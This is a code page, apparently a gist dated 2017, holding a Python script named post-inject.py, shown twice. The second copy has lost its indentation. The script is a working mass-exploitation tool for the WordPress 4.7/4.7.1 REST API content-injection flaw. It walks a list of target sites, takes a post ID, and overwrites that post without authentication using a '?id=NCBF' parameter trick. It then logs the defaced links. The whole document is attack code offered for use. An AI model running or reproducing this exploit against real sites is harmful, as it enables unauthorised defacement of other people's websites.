0xv · February 15, 2017 13:15
diff --git a/post-inject.py b/post-inject.py
 import re, json, urllib2, sys

 class WpContent:
 	def __init__(self, url):
 		self.__url = url
 		self.__response = urllib2.urlopen(self.__url).read()

 	def get_api_wp(self):
 		return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

 	def get_wp_version(self):
 		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
 		if check_version == "4.7" or check_version == "4.7.1":
 			check_version += " ( Maybe vulnerable to inject ) "
 		else:
 			check_version += " ( Maybe not vulnerable to inject ) "
 		return check_version

 	def get_wp_post_information(self):
 		get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
 		load_info = json.loads(get_post)
 		return load_info[0]

 	def inject_content(self, id_content, content):
 		data = json.dumps({
 			'title':"Blah blah",
 			'slug':"blah-blah",
 			'content':content
 			})
 		params = {'Content-Type':'application/json'}
 		full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
 		req = urllib2.Request(full_url, data, params)
 		resp = urllib2.urlopen(req).read()
 		return json.loads(resp)

 	def save(self,url):
 		file = open('result.txt','a')
 		file.write(url+'\n')
 		file.close


 def main():
 	if len(sys.argv) < 2:
 		sys.exit(1)

 	with open(sys.argv[1], 'r') as targets:
 		targets = targets.read().splitlines()

 	with open('content.txt', 'r') as content:
 		content = content.read()
 	for url in targets:
 		try:
 			wp = WpContent(url)
 			wp_version = wp.get_wp_version()
 			post_info = wp.get_wp_post_information()
 			print('=========================================')
 			print('{0} WP Version: {1}'.format(url,wp_version))
 			print('Try Inject ID: {0}').format(post_info['id'])
 			inject = wp.inject_content(post_info['id'], content)
 			wp.save(inject['link'])
 			print('Post updated: '+inject['link'])
 			print('=========================================')

 		except Exception as e:
 			print e


 if __name__ == '__main__':
 	main()
	import re, json, urllib2, sys

	class WpContent:
	def __init__(self, url):
	self.__url = url
	self.__response = urllib2.urlopen(self.__url).read()

	def get_api_wp(self):
	return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

	def get_wp_version(self):
	check_version = re.findall(r'ver=(.*)"', self.__response)[0]
	if check_version == "4.7" or check_version == "4.7.1":
	check_version += " ( Maybe vulnerable to inject ) "
	else:
	check_version += " ( Maybe not vulnerable to inject ) "
	return check_version

	def get_wp_post_information(self):
	get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
	load_info = json.loads(get_post)
	return load_info[0]

	def inject_content(self, id_content, content):
	data = json.dumps({
	'title':"Blah blah",
	'slug':"blah-blah",
	'content':content
	})
	params = {'Content-Type':'application/json'}
	full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
	req = urllib2.Request(full_url, data, params)
	resp = urllib2.urlopen(req).read()
	return json.loads(resp)

	def save(self,url):
	file = open('result.txt','a')
	file.write(url+'\n')
	file.close


	def main():
	if len(sys.argv) < 2:
	sys.exit(1)

	with open(sys.argv[1], 'r') as targets:
	targets = targets.read().splitlines()

	with open('content.txt', 'r') as content:
	content = content.read()
	for url in targets:
	try:
	wp = WpContent(url)
	wp_version = wp.get_wp_version()
	post_info = wp.get_wp_post_information()
	print('=========================================')
	print('{0} WP Version: {1}'.format(url,wp_version))
	print('Try Inject ID: {0}').format(post_info['id'])
	inject = wp.inject_content(post_info['id'], content)
	wp.save(inject['link'])
	print('Post updated: '+inject['link'])
	print('=========================================')

	except Exception as e:
	print e


	if __name__ == '__main__':
	main()